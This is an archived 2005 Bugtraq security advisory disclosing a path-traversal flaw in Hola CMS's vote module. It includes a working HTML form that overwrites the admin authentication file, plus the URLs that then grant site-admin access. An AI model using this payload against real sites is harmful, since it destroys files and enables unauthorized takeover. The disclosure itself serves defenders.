lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20050315170922.1037.qmail@www.securityfocus.com>
Date: 15 Mar 2005 17:09:22 -0000
From: Virginity Security <advisory05@...fiweb.de>
To: bugtraq@...urityfocus.com
Subject: Virginity Security Advisory 2005-002 : Hola CMS - Another File
    destruction and System access




- - - --------------------------------------------------------------------
Virginity Security Advisory 2005-002
- - - --------------------------------------------------------------------
             DATE : 2005-03-13 15:11 GMT
             TYPE : remote
VERSIONS AFFECTED : hola-cms-1.4.9-1 (http://holacms.drunkencat.net/)
           AUTHOR : Virginity
  ADVISORY NUMBER : 004
- - - --------------------------------------------------------------------


Description:

Like the one in SA-2005-001:
A new patched version 1.4.9-1 got released where that issue was marked as solved.
The Vote-Module(vote_save_results.php) now checks with strpos() wether 
the submitted "vote_filename" variable contains "holaDB/votes" at position 0.

BUT! Since we all know how to change directories by typing ../
we can still manipluate or destroy every file on the whole server
by simply doing "vote_filename=holaDB/votes/../../[anything we want]"!!!
Below the updated example how to destroy login-authentification file and gaining access
to admin-functions!

Really sad that the quick patch (released 3? hours after notifcation)
doesn't really work.

Author of the Software has been notified.

- - - --------------------------------------------------------------------


Example:

Create this html form (that makes it easier to use it on multiple targets):

<form action="http://[target]/[site-with-vote].php?vote=1" method="POST">
<input type="hidden" name="vote_filename" value="holaDB/votes/../../admin/multiuser/multiuser.php">
<input type="hidden" name="result" value="0">
<input type="submit" value="Stimme abgeben" name="button">
</form>

Of course you'll have to edit [target] and [site-with-vote] to match your site!
Now when you push the button the first lines of the multiuser.php (which
includes the authentication mechanism) get overwritten and by calling
http://[target]/admin/index_cms.php
you have access to all user functions.
by calling
http://[target]/admin/[module you want].php?username=siteadmin
to all siteadmin functions!


- - - --------------------------------------------------------------------


Solution:

Use other CMS... i think PHP-Nuke isn't that vulnerable ;)

- - - --------------------------------------------------------------------


Personal note:

YES! The girl did it again :)
Contact me on IRC!

- - - --------------------------------------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ